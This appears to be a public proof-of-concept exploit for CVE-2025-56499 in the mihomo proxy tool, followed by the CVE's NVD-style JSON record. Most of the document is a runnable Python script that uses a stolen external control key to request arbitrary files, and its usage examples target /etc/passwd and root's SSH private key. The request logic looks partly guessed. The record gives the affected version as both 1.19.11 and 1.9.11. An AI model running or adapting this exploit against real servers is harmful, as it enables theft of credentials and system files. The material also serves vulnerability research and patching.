CVE-2025-56499

# CVE-2025-56499 PoC - mihomo External Control Key Exploitation # Description: Exploit incorrect access control to read arbitrary files via external control interface import requests import json import argparse def exploit_mihomo(target_url, control_key, file_path): """ Exploit CVE-2025-56499 to read arbitrary files from mihomo server Args: target_url: Base URL of mihomo admin interface control_key: External control key obtained from config file file_path: Path to file to read (e.g., /etc/passwd) """ # Construct the external control API endpoint api_url = f"{target_url.rstrip('/')}/configs?force=true" # Prepare headers with control key headers = { 'Authorization': f'Bearer {control_key}', 'Content-Type': 'application/json' } # Method 1: Try to read config file directly payload = { 'path': file_path } try: print(f"[*] Target: {target_url}") print(f"[*] Attempting to read: {file_path}") # Attempt 1: Direct file read via configs endpoint response = requests.get(api_url, headers=headers, params=payload, timeout=10) if response.status_code == 200: print(f"[+] Success! File content retrieved:") print(response.text) return True # Attempt 2: Try POST request with file path response = requests.post(api_url, headers=headers, json=payload, timeout=10) if response.status_code == 200: print(f"[+] Success! File content retrieved via POST:") print(response.text) return True except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False print("[-] Exploitation failed - check control key and target") return False def main(): parser = argparse.ArgumentParser(description='CVE-2025-56499 PoC') parser.add_argument('-t', '--target', required=True, help='Target mihomo URL') parser.add_argument('-k', '--key', required=True, help='External control key') parser.add_argument('-f', '--file', default='/etc/passwd', help='File to read') args = parser.parse_args() exploit_mihomo(args.target, args.key, args.file) if __name__ == '__main__': main() # Usage: # python cve-2025-56499.py -t http://target:9090 -k "your-control-key" -f /etc/passwd # python cve-2025-56499.py -t http://target:9090 -k "your-control-key" -f /root/.ssh/id_rsa

{"cve": {"id": "CVE-2025-56499", "sourceIdentifier": "[email protected]", "published": "2025-11-18T19:15:49.653", "lastModified": "2025-12-31T14:01:17.820", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incorrect access control in mihomo v1.19.11 allows authenticated attackers with low-level privileges to read arbitrary files with elevated privileges via obtaining the external control key from the config file."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:metacubex:mihomo:1.9.11:*:*:*:*:*:*:*", "matchCriteriaId": "93F71630-8934-4A04-979D-70A3410191F1"}]}]}], "references": [{"url": "https://github.com/Cherrling/CVE-2025-56499", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/MetaCubeX/mihomo/tree/v1.19.11", "source": "[email protected]", "tags": ["Product"]}]}}